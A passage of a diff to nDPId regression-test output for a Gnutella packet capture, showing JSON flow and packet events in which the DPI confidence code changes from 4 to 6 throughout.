{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABtuPMAAIAR0zIKAAIPTOJVaXAJGMoAWVtEeBkxArN0R\/zFhR7fMHiNqUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABt3TUAAIAR+CYKAAIPsAqpCnAJMf8AWSFl+80xAiQL9J1qTYJox\/q2yUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABttG4AAIARw98KAAIPVMVhXnAJBVAAWURxEsIxAlakBl2ebhXyeemOeEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":129210,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":129210,"pkt":"CAAn5uVZUlQAEjUCCABFwACJBngAAH8BcgpUxWFeCgACDwMDv5kAAAAARQAAbbRuAAB\/EcTfCgACD1TFYV5wCQVQAFlEcRLCMQJWpAZdnm4V8nnpjnhEAAA6AAAABUdUS0cAACidCo0G3v\/IJjwziXwskXn9hKthBF0v4jVwCQEBAACHpNmcaMjLrgz72SMJ7seAsLgKkg=="} 
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.868061} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.868061} 
01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":129344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":129344,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBnkAAEARwydM4lVpCgACDxjKcAkC3ybmeBkxArN0R\/zFhR7fMHiNqUQAAMACAAAGR1RLRwAAnpfHNvHWgDxrrvMwVMRjMd2z66QETOJVaRjKAQAAAAS4IqVOFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaeldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkEdUS0cAALyzuhm5M4uYhLkABGRqZbdy38iOBGIjVe59rQ=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtA3wAAIARyZcKAAIPY\/r9Y3AJLisAWcb1VskxAtkesLI2UdbrHnvJmEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtFDMAAIARzrIKAAIPZAHninAJ3O4AWa5oGAExAiz8sZobXXh7jKY+cEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTdUAAIARVp8KAAIPVBw14XAJrzsAWRB8uXsxAsNFs8rL71MevwvUD0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2247,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":131668,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2247,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":131668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":131668,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FboAAIARBg4KAAIPuyVXvXAJGMoAIPd5R05EED8AAQFUC1FLUlAGUk5BXS\/iNQlw"} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":131668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":131668,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0f68AAIAR17kKAAIPd+BfYXAJtRQAIJbPR05EED8BAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -1283,25 +1283,25 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":134428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":134428,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAsMAAIAR5egKAAIP1eVv4HAJEwwAWfhP39IxAiTPawjpKg8FqMjKpUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAv8AAIARQCgKAAIPtXY11HAJdS4AWScUhfMxArbJ5SyHh4zpjzvfRkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
